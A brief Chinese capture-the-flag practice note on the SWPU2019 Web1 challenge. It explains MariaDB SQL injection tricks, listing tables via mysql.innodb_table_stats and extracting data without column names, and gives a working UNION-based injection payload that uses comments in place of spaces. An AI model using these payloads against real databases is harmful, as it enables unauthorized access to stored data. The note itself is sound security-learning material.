刷題記錄:[SWPU2019]Web1


刷題記錄:[SWPU2019]Web1

題目復現鏈接:https://buuoj.cn/challenges

知識點

MariaDB的SQL注入

https://mariadb.com/kb/en/mysqlinnodb_table_stats/
mysql.innodb_table_stats用於報表名
select group_concat(table_name) from mysql.innodb_table_stats

將列轉換成行,無列名注入

-1'union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
select group_concat(b) from(select 1 as b,2,3,4 union select*from diner)x


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM